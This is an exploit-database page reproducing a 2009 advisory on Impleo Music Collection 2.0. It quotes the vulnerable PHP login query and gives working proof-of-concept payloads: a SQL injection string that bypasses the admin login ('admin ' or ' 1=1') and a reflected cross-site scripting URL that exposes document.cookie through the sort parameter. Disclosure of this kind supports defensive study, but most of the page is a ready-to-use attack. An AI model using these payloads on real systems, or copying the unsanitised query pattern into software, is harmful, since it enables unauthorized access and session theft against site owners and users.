[] NeoSense
E X P L O I T S
title author type platform port cve id

impleo music Collection 2.0 - SQL Injection / Cross-Site Scripting

Author: SirGod
type: webapps
platform: php
port: 
date_added: 2009-06-14 
date_updated:  
verified: 1 
codes: OSVDB-55289;CVE-2009-2154;OSVDB-55288;CVE-2009-2153 
tags: 
aliases:  
screenshot_url:  
application_url: 
#################################################################################################################
[+] Impleo Music Collection 2.0 (SQL/XSS) Multiple Remote Vulnerabilities
[+] Download: http://sappy.dk/impleo/download-impleo
[+] Discovered By SirGod
[+] www.mortal-team.org
#################################################################################################################

[+] SQL Injection ( Auth Bypass )

- Requirements : magic_quotes_gpc = off

- Vulnerable code in /admin/login.php

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 $postbruger = $_POST['username'];
 $postpass = md5($_POST['password']);
 $resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = '$postbruger' AND password = '$postpass'")
or die("<p>" . mysql_error() . "</p>\n");
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

- PoC

  Login Username : admin ' or ' 1=1
  Login Password : anything


[+] Cross Site Scripting

- PoC

    http://127.0.0.1/[path]/index.php?sort="><script>alert(document.cookie)</script>

#################################################################################################################

# milw0rm.com [2009-06-15]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.